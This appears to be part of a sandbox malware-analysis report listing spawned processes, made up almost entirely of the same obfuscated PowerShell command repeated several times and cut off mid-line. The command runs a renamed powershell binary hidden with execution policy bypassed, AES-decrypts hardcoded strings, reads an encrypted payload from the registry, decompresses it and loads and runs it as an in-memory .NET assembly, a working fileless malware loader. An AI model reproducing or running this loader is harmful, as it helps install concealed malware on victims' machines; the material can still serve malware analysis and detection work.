[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        Hide Artifacts: Hidden Window
        
        PID:4264
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        Hide Artifacts: Hidden Window
        
        PID:5896
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        
        PID:9004
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        25⤵
        
        PID:8360
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8924).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = 